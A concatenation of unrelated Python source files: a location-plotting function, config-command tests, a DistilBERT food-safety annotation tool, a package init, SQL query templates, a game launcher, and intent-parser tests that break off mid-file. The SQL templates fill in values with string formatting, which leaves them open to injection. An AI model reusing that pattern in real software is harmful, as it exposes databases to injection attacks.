axis : matplotlib.pyplot.Artist, optional
axis on which to draw the plot
Examples
--------
>>> locs.as_locations.plot('output.png', radius=200, positionfixes=pfs, staypoints=sp, plot_osm=True)
"""
if axis is None:
_, ax = regular_figure()
else:
ax = axis
_, locations = check_gdf_planar(locations, transform=True)
if staypoints is not None:
staypoints.as_staypoints.plot(radius=staypoints_radius, positionfixes=positionfixes, plot_osm=plot_osm, axis=ax)
elif positionfixes is not None:
positionfixes.as_positionfixes.plot(plot_osm=plot_osm, axis=ax)
elif plot_osm:
west = locations["center"].x.min() - 0.03
east = locations["center"].x.max() + 0.03
north = locations["center"].y.max() + 0.03
south = locations["center"].y.min() - 0.03
plot_osm_streets(north, south, east, west, ax)
center_latitude = (ax.get_ylim()[0] + ax.get_ylim()[1]) / 2
radius = meters_to_decimal_degrees(radius, center_latitude)
for pt in locations.to_dict("records"):
circle = mpatches.Circle((pt["center"].x, pt["center"].y), radius, facecolor="none", edgecolor="r", zorder=4)
ax.add_artist(circle)
ax.set_aspect("equal", adjustable="box")
if out_filename is not None:
save_fig(out_filename, formats=["png"])
else:
plt.show()
|
#
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: EPL-2.0
#
from __future__ import print_function
import pytest
import re
from test_utils.io import catch_stdout
from mlt.commands.config import ConfigCommand
from mlt.utils import constants
@pytest.fixture
def init_mock(patch):
return patch('config_helpers.load_config')
@pytest.fixture
def update_config_mock(patch):
return patch('config_helpers.update_config')
def config(list=False, set=False, remove=False, name=None, value=None):
config_cmd = ConfigCommand({"list": list, "set": set, "remove": remove,
"<name>": name, "<value>": value})
with catch_stdout() as caught_output:
config_cmd.action()
output = caught_output.getvalue()
return output
def test_uninitialized_config_call():
"""
Tests calling the config command before the app has been initialized.
"""
with catch_stdout() as caught_output:
with pytest.raises(SystemExit):
ConfigCommand({})
output = caught_output.getvalue()
expected_error = "This command requires you to be in an `mlt init` " \
"built directory"
assert expected_error in output
def test_list_config(init_mock):
"""
Test calling the config list command and checks the output.
"""
init_mock.return_value = {
"namespace": "foo",
"registry": "bar",
constants.TEMPLATE_PARAMETERS: {
"num_workers": 2
}
}
output = config(list=True)
p = re.compile("namespace[\s]+foo")
assert p.search(output)
p = re.compile("registry[\s]+bar")
assert p.search(output)
p = re.compile("{}.num_workers[\s]+2".format(
constants.TEMPLATE_PARAMETERS))
assert p.search(output)
def test_list_empty_configs(init_mock):
"""
Tests calling the config list command when there are no configs.
"""
init_mock.return_value = {}
output = config(list=True)
assert "No configuration parameters to display." in output
def test_set_existing_config(init_mock, update_config_mock):
"""
Tests modifying an existing config parameter
"""
mlt_config = {
"namespace": "foo",
"registry": "bar",
constants.TEMPLATE_PARAMETERS: {
"num_workers": 2
}
}
init_mock.return_value = mlt_config
modified_parameter = "namespace"
new_value = "new-namespace"
config(set=True, name=modified_parameter, value=new_value)
mlt_config[modified_parameter] = new_value
update_config_mock.assert_called_with(mlt_config)
def test_set_new_config(init_mock, update_config_mock):
"""
Tests setting a new config parameter, and ensures that the parameter is
added to the config file.
"""
mlt_config = {
"namespace": "foo",
"registry": "bar",
constants.TEMPLATE_PARAMETERS: {
"num_workers": 2
}
}
init_mock.return_value = mlt_config
new_parameter = "new_parameter"
new_value = "new_value"
config(set=True, name=new_parameter, value=new_value)
mlt_config[new_parameter] = new_value
update_config_mock.assert_called_with(mlt_config)
def test_set_existing_template_parameter(init_mock, update_config_mock):
"""
Tests modifying an existing template parameter
"""
mlt_config = {
"namespace": "foo",
"registry": "bar",
constants.TEMPLATE_PARAMETERS: {
"num_workers": 2
}
}
init_mock.return_value = mlt_config
modified_parameter = "{}.num_workers".format(constants.TEMPLATE_PARAMETERS)
new_value = 4
config(set=True, name=modified_parameter, value=new_value)
mlt_config[constants.TEMPLATE_PARAMETERS][modified_parameter] = new_value
update_config_mock.assert_called_with(mlt_config)
def test_set_remove_new_template_parameter(init_mock, update_config_mock):
"""
Tests setting a new template parameter, ensures that the parameter is
added to the config file, then removes the parameter.
"""
mlt_config = {
"namespace": "foo",
"registry": "bar",
constants.TEMPLATE_PARAMETERS: {
"num_workers": 2
}
}
init_mock.return_value = mlt_config
# Set new template parameter
new_parameter = "{}.num_ps".format(constants.TEMPLATE_PARAMETERS)
new_value = 1
config(set=True, name=new_parameter, value=new_value)
# Check that the config update was called with the new parameter
expected_parameter = mlt_config
expected_parameter[constants.TEMPLATE_PARAMETERS][new_parameter] = \
new_value
update_config_mock.assert_called_with(expected_parameter)
# Remove the parameter, and we should be back to the original
config(remove=True, name=new_parameter)
update_config_mock.assert_called_with(mlt_config)
def test_set_remove_new_parameter(init_mock, update_config_mock):
"""
Tests setting and removing a new parameter a few levels deep.
"""
mlt_config = {
"namespace": "foo",
"registry": "bar",
constants.TEMPLATE_PARAMETERS: {
"num_workers": 2
}
}
init_mock.return_value = mlt_config
# Set new parameter
new_parameter = "foo1.foo2.foo3"
new_value = "new_value"
config(set=True, name=new_parameter, value=new_value)
# check that the config update was called with the new parameter
expected_config = mlt_config
expected_config["foo1"] = {}
expected_config["foo1"]["foo2"] = {}
expected_config["foo1"]["foo2"]["foo3"] = new_value
update_config_mock.assert_called_with(expected_config)
# Remove the parameter and check that we are back to the original config
config(remove=True, name=new_parameter)
update_config_mock.assert_called_with(mlt_config)
def test_remove_config_param(init_mock, update_config_mock):
"""
Tests removing an existing config
"""
mlt_config = {
"namespace": "foo",
"registry": "bar",
constants.TEMPLATE_PARAMETERS: {
"num_workers": 2
}
}
init_mock.return_value = mlt_config
# Remove the registry parameter and check the config update arg
config(remove=True, name="registry")
expected_config = {
"namespace": "foo",
constants.TEMPLATE_PARAMETERS: {
"num_workers": 2
}
}
update_config_mock.assert_called_with(expected_config)
@pytest.mark.parametrize("param_name", [
"does-not-exist",
"{}.does-not-exist".format(constants.TEMPLATE_PARAMETERS),
"subparam.does-not-exist"
])
def test_remove_invalid_param(init_mock, param_name):
"""
Tests trying to remove a parameter that does not exist
"""
mlt_config = {
"namespace": "foo",
"registry": "bar",
constants.TEMPLATE_PARAMETERS: {
"num_workers": 2
}
}
init_mock.return_value = mlt_config
# Remove the registry parameter and check the config update arg
with pytest.raises(SystemExit):
output = config(remove=True, name=param_name)
assert "Unable to find config" in output
|
import eel
import os
import re
import time
import gzip
import csv
import hashlib
import json
import shutil
from datetime import datetime
from random import shuffle
from transformers import DistilBertTokenizer, DistilBertForTokenClassification
# downloading DistilBERT will take a while the first time
import torch
import torch.optim as optim
tokenizer = DistilBertTokenizer.from_pretrained('distilbert-base-cased', do_lower=False)
label_indexes = {"None":0, "Hazard":1, "Food":2, "Origin":3, "Destination":4}
eel.init('./')
current_model = None # current ML model
new_annotation_count = 1 # current count of annotations since last training (1 to trigger immediate training)
currently_training = False # if currently training
unlabeled_data = []
unlabeled_data_path = "safety_reports_v1.csv.gz"
labeled_data = []
evaluation_data = []
labeled_data_path = "data/safety_reports_training.csv"
evaluation_data_path = "data/safety_reports_evaluation.csv"
labeled_ids = {} # track already-labeled data
predicted_confs = {} # predicted confidence of current label on current model by url
all_predicted_confs = {} # most recent predicted confidence, not necessarily from most recent model
verbose = True
@eel.expose
def save_report(report):
'''Save annotated report
'''
global label_indexes
global labeled_data
global labeled_ids
global labeled_data_path
global evaluation_data_path
global new_annotation_count
report_id = report[0]
report_text = report[1]
report_date = report[2]
report_food = report[3]
report_hazard = report[4]
report_origin = report[5]
report_destination = report[6]
report.append(datetime.today().strftime('%Y-%m-%d-%H:%M:%S'))
if report_text == "":
return # empty submission
hazard_labels = get_labels_from_text(report_text, report_hazard, label_indexes["Hazard"])
food_labels = get_labels_from_text(report_text, report_food, label_indexes["Food"])
origin_labels = get_labels_from_text(report_text, report_origin, label_indexes["Origin"])
destination_labels = get_labels_from_text(report_text, report_destination, label_indexes["Destination"])
text_labels = []
numerical_labels = []
for ind in range(0,len(hazard_labels)):
if hazard_labels[ind] != 0:
text_labels.append("Hazard")
numerical_labels.append(hazard_labels[ind])
elif food_labels[ind] != 0:
text_labels.append("Food")
numerical_labels.append(food_labels[ind])
elif origin_labels[ind] != 0:
text_labels.append("Origin")
numerical_labels.append(origin_labels[ind])
elif destination_labels[ind] != 0:
text_labels.append("Destination")
numerical_labels.append(destination_labels[ind])
else:
text_labels.append("None")
numerical_labels.append(0)
tokens = tokenizer.tokenize(report_text)
numerical_tokens = tokenizer.convert_tokens_to_ids(tokens)
annotation = json.dumps([tokens, text_labels, numerical_tokens, numerical_labels])
report.append(annotation)
labeled_ids[report_id] = True
if is_evaluation(report_text):
append_data(evaluation_data_path,[report])
evaluation_data.append(report)
else:
append_data(labeled_data_path,[report])
labeled_data.append(report)
new_annotation_count += 1
def is_evaluation(text):
hexval = hashlib.md5(text.encode('utf-8')).hexdigest()
intval = int(hexval, 16)
if intval%4 == 0:
return True
else:
return False
def get_labels_from_text(text, annotation, label=1):
'''Returns the per-token labels for annotation within text
Note: returns the first match only
'''
tokens = tokenizer.tokenize(text)
annotation_tokens = tokenizer.tokenize(annotation)
if len(annotation_tokens) == 0:
return [0] * len(tokens)
labels = []
for ind in range(0, len(tokens)):
if tokens[ind] == annotation_tokens[0]:
cur_ind = ind
matched = True
for token in annotation_tokens:
if tokens[cur_ind] != token:
matched = False
break
cur_ind += 1
if matched:
for token in annotation_tokens:
labels.append(label)
while len(labels) < len(tokens):
labels.append(0)
break
else:
labels.append(0)
return labels
@eel.expose
def get_next_report():
'''Gets next report chronologically
'''
global unlabeled_data
for report in unlabeled_data:
report_id = report[0]
if report_id in labeled_ids:
continue
return report
@eel.expose
def get_candidate_spans(text, use_model_predictions=True, use_ngrams=True):
'''Returns the potential spans in the text
Uses all ngrams in the text if no model exists
Uses model predictions if a model exists
When a model exists, backs off to ngrams
by having them lower ranked than model predictions
'''
global current_model
global label_indexes
spans = {}
# get potential spans. Back off to ngrams if none exist
ngrams = get_ngrams(text)
for label in label_indexes:
if label == "None":
continue
spans[label] = []
# MODEL PREDICTIONS GET TOP PRIORITY
if use_model_predictions and current_model != None:
spans = get_predictions(current_model, text)
# NGRAMS WITHIN THE TEXT ARE NEXT PRIORITY
if use_ngrams:
for label in spans:
candidates = spans[label]
for ngram in ngrams:
# TODO: use dict if needs to be faster
if ngram not in candidates:
candidates.append(ngram)
spans[label] = candidates
return spans
def get_ngrams(text, min_len=3,max_len=50):
'''Returns word ngrams between given character lengths
'''
ngrams = []
for start_ind in range(0, len(text)):
if start_ind == 0 or (re.match("\W", text[start_ind-1]) and re.match("\w", text[start_ind])):
# at start of token
for end_ind in range(start_ind+(min_len-1), min(start_ind+(max_len-1),len(text))):
if end_ind + 2 > len(text) or (re.match("\W", text[end_ind+1]) and re.match("\w", text[end_ind])):
string = text[start_ind: end_ind+1]
ngrams.append(string)
return ngrams
def append_data(filepath, data):
with open(filepath, 'a', errors='replace') as csvfile:
writer = csv.writer(csvfile)
writer.writerows(data)
csvfile.close()
def load_reports(filepath):
'''Loads already-annotated data
'''
if not os.path.exists(filepath):
return []
new_data = []
with open(filepath, 'r') as csvfile:
reader = csv.reader(csvfile)
for item in reader:
labeled_ids[item[0]] = True # record this is now labeled
new_data.append(item)
return new_data
@eel.expose
def get_recent_reports(origin = "", hazard = "", food = ""):
'''Loads reports in reverse chronological order
Reports must match at least one of origin, hazard, or food
'''
global labeled_data
global evaluation_data
all_reports = labeled_data + evaluation_data
all_reports.sort(reverse=True, key=lambda x: x[0])
relevant_reports = []
for report in all_reports:
country_match = False
if origin == report[5] and origin != "":
country_match = True
hazard_match = False
if hazard == report[4] and hazard != "":
hazard_match = True
food_match = False
if food == report[3] and food != "":
food_match = True
if country_match or hazard_match or food_match:
relevant_reports.append(report)
return relevant_reports
def get_predictions(model, text):
'''Get model predictions of potential spans within the text
'''
inputs = tokenizer(text, return_tensors="pt")
candidates_by_label = {}
with torch.no_grad():
outputs = model(**inputs) #, labels=labels)
logits = outputs[0][0]
tokens = [""] + tokenizer.tokenize(text) + [""]
# iterate all predicted labels
for label in label_indexes:
label_number = label_indexes[label]
if label_number == 0:
continue # skip non-spans
uncertainties = []
for ind in range(1, len(tokens)-1):
prob_dist = torch.softmax(logits[ind], dim=0)
conf = prob_dist[label_number]
max_conf = torch.max(prob_dist)
ratio_conf = 1 - conf/max_conf
uncertainties.append(ratio_conf.item())
candidates = get_most_confident_spans(text, uncertainties, threshold=0.2)
less_conf_candidates = get_most_confident_spans(text, uncertainties, threshold=0.6)
for candidate in less_conf_candidates:
if candidate not in candidates:
candidates.append(candidate)
candidates_by_label[label] = candidates
return candidates_by_label
def convert_tokens_to_text(tokens, reference_text):
'''Find best match for DistilBert tokens in the actual text
'''
text = tokenizer.convert_tokens_to_string(tokens)
if text in reference_text:
return text
else:
# try making spaces optional
regex = re.escape(text).replace("\ ","\s*")
match = re.search("("+regex+")", reference_text)
if match:
return match.group(1)
else:
# we couldn't find a match - return the tokenizer's text
return text
def get_most_confident_spans(text, uncertainties, threshold=0.5):
'''Get all spans above the threshold in confidence
'''
tokens = tokenizer.tokenize(text)
candidates = []
for start_ind in range(0, len(tokens)):
if uncertainties[start_ind] <= threshold and not tokens[start_ind].startswith('##'):
for end_ind in range(start_ind, len(tokens)):
if uncertainties[end_ind] <= threshold and not tokens[end_ind].startswith('##'):
candidate = convert_tokens_to_text(tokens[start_ind:end_ind+1], text)
if candidate not in text:
print("WARNING couldn't find span in text: "+candidate)
else:
candidates.append(candidate)
# return in descending length
candidates.sort(key=len, reverse=True)
return candidates
def train_item(model, annotations, text):
model.zero_grad()
# numerical labels, padded for sentence start/fin tokens
numerical_labels = [0] + annotations[3] + [0]
labels = torch.tensor(numerical_labels).unsqueeze(0)
inputs = tokenizer(text, return_tensors="pt")
outputs = model(**inputs, labels=labels)
loss, logits = outputs[:2]
optimizer = optim.SGD(model.parameters(), lr=0.01)
loss.backward()
optimizer.step()
def retrain(epochs_per_item=2, min_to_train=5):
global current_model
global currently_training
global new_annotation_count
global labeled_data
if currently_training:
"skipping while model already training"
return
if len(labeled_data) < min_to_train:
print("too few annotations to train: "+str(len(labeled_data)))
return
currently_training = True
new_annotation_count = 0
new_model = DistilBertForTokenClassification.from_pretrained('distilbert-base-cased', num_labels=5)
for epoch in range(0, epochs_per_item):
print("epoch "+str(epoch))
shuffle(labeled_data)
for report in labeled_data:
annotations = json.loads(report[8])
report_text = report[1]
train_item(new_model, annotations, report_text)
eel.sleep(0.01) # allow other processes through
'''
MODEL EVALUATION CODE HERE IF YOU WANT TO TEST THAT IT IS GETTING BETTER
'''
current_model = new_model
timestamp = re.sub('\.[0-9]*','_',str(datetime.now())).replace(" ", "_").replace("-", "").replace(":","")
number_items = str(len(labeled_data))
model_path = "models/"+timestamp+number_items+".model"
current_model.save_pretrained(model_path)
if verbose:
print("saved model to "+model_path)
clean_old_models()
currently_training = False
def clean_old_models(max_prior=4):
models = []
files = os.listdir('models/')
for file_name in files:
if os.path.isdir('models/'+file_name):
if file_name.endswith(".model"):
models.append('models/'+file_name)
if len(models) > max_prior:
for filepath in models[:-4]:
assert("models" in filepath and ".model" in filepath)
if verbose:
print("removing old model "+filepath)
shutil.rmtree(filepath)
def load_existing_model():
global current_model
model_path = ""
files = os.listdir('models')
for file_name in files:
if file_name.endswith(".model"):
model_path = 'models/'+file_name
if model_path != '':
if verbose:
print("Loading model from "+model_path)
current_model = DistilBertForSequenceClassification.from_pretrained(model_path, num_labels=5)
eel.sleep(0.1)
# get_predictions()
else:
if verbose:
print("Creating new uninitialized model (OK to ignore warnings)")
current_model = DistilBertForTokenClassification.from_pretrained('distilbert-base-uncased', num_labels=5)
def check_to_train():
global new_annotation_count
global last_annotation
global currently_training
while True:
print("Checking to retrain")
if new_annotation_count > 0:
retrain()
# print(ct)
eel.sleep(10) # Use eel.sleep(), not time.sleep()
eel.spawn(check_to_train)
# directories with data
unlabeled_file = gzip.open(unlabeled_data_path, mode='rt')
csvobj = csv.reader(unlabeled_file,delimiter = ',',quotechar='"')
for row in csvobj:
unlabeled_data.append(row)
labeled_data = load_reports(labeled_data_path)
evaluation_data = load_reports(evaluation_data_path)
eel.start('food_safety.html', size=(800, 600))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Data container
"""
from __future__ import (
print_function,
division,
absolute_import,
unicode_literals)
from six.moves import xrange
# =============================================================================
# Imports
# =============================================================================
import logging
from .base import (
ObjectUtilMixin,
BaseData)
from .event import (
EventUtilMixin,
EventData)
from .event_with_score import (
ScoreUtilMixin,
EventWithScoreData)
# =============================================================================
# Metadata variables
# =============================================================================
# =============================================================================
# Public symbols
# =============================================================================
__all__ = [
'BaseData',
'ObjectUtilMixin',
'EventData',
'EventUtilMixin',
'EventWithScoreData',
'ScoreUtilMixin']
# =============================================================================
# Constants
# =============================================================================
# =============================================================================
# Variables
# =============================================================================
# =============================================================================
# Functions
# =============================================================================
# =============================================================================
# Classes
# =============================================================================
# =============================================================================
# Module initialization
# =============================================================================
# init logging system
logger = logging.getLogger('kamrecsys')
if not logger.handlers:
logger.addHandler(logging.NullHandler())
# =============================================================================
# Test routine
# =============================================================================
def _test():
""" test function for this module
"""
# perform doctest
import sys
import doctest
doctest.testmod()
sys.exit(0)
# Check if this is call as command script
if __name__ == '__main__':
_test()
|
GET_USER = """
SELECT *
FROM users
WHERE user_id={}
"""
INSERT_USER = """
INSERT INTO users
VALUES ({}, '{}', {}, '{}', '{}')
"""
DELETE_USER = """
DELETE FROM users
WHERE user_id={}
"""
UPDATE_USER = """
UPDATE users
SET
name = '{}',
age = {},
gender = '{}',
country = '{}'
WHERE
user_id = {}
"""
SELECT_MODEL = """
SELECT *
FROM rf_model
WHERE model_name = '{}'
"""
|
import RockPaperScissors.game as rps
game = rps.Game()
game.run(True)
|
from intent_parser.server.intent_parser_server import IntentParserServer
from intent_parser.utils.intent_parser_utils import IPSMatch
import intent_parser.utils.intent_parser_utils as intent_parser_utils
import unittest
class IpsUtilsTest(unittest.TestCase):
def setUp(self):
"""
Configure an instance of IntentParserServer for spellcheck testing.
"""
pass
def get_idx_for_search(self, search_results, comp):
"""
Given a list of results from a search_results list, return the corresponding indices
"""
return [search_results[c] for c in comp]
def test_find_overlaps(self):
"""
"""
####################################
# Test cases with wrong paragraph indices, expected no overlaps
search_results = [{"paragraph_index" : 0, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 2, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 3, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'}]
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
self.assertTrue(len(overlaps) == 1)
self.assertTrue(max_idx == start_idx)
self.assertTrue(overlaps[0] == search_results[start_idx])
####################################
# Test for no overlaps
search_results = [{"paragraph_index" : 0, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 32, "end_offset" : 35, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 38, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 2, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 2, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 2, "offset": 18, "end_offset" : 20, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 2, "offset": 22, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
]
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
self.assertTrue(len(overlaps) == 1)
self.assertTrue(max_idx == start_idx)
self.assertTrue(overlaps[0] == search_results[start_idx])
####################################
# Test for overlaps off the right end
search_results = [{"paragraph_index" : 0, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 18, "end_offset" : 26, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 8, "end_offset" : 12, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 24, "end_offset" : 35, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 0, 1 : 7}
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
if start_idx in match_idxs:
self.assertTrue(max_idx == match_max_idx[start_idx])
for m in matches[start_idx]:
self.assertTrue(search_results[m] in overlaps)
else:
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
# Reverse of previous test
search_results = [{"paragraph_index" : 0, "offset": 8, "end_offset" : 12, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 24, "end_offset" : 35, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 18, "end_offset" : 26, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 6, 1 : 1}
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
if start_idx in match_idxs:
self.assertTrue(max_idx == match_max_idx[start_idx])
for m in matches[start_idx]:
self.assertTrue(search_results[m] in overlaps)
else:
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
####################################
# Test for overlaps off the left end
search_results = [{"paragraph_index" : 0, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 18, "end_offset" : 26, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 2, "end_offset" : 6, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 10, "end_offset" : 20, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 0, 1 : 7}
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
if start_idx in match_idxs:
self.assertTrue(max_idx == match_max_idx[start_idx])
for m in matches[start_idx]:
self.assertTrue(search_results[m] in overlaps)
else:
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
# Reverse of previous test
search_results = [{"paragraph_index" : 0, "offset": 2, "end_offset" : 6, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 10, "end_offset" : 20, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 18, "end_offset" : 26, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 6, 1 : 1}
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
if start_idx in match_idxs:
self.assertTrue(max_idx == match_max_idx[start_idx])
for m in matches[start_idx]:
self.assertTrue(search_results[m] in overlaps)
else:
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
####################################
# Test for overlaps query inside comp
search_results = [{"paragraph_index" : 0, "offset": 3, "end_offset" : 5, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 12, "end_offset" : 18, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 2, "end_offset" : 6, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 10, "end_offset" : 20, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 6, 1 : 7}
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
if start_idx in match_idxs:
self.assertTrue(max_idx == match_max_idx[start_idx])
for m in matches[start_idx]:
self.assertTrue(search_results[m] in overlaps)
else:
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
# Reverse of previous test
search_results = [{"paragraph_index" : 0, "offset": 2, "end_offset" : 6, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 10, "end_offset" : 20, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 3, "end_offset" : 5, 'term' : 'test', 'text' : 'text'},
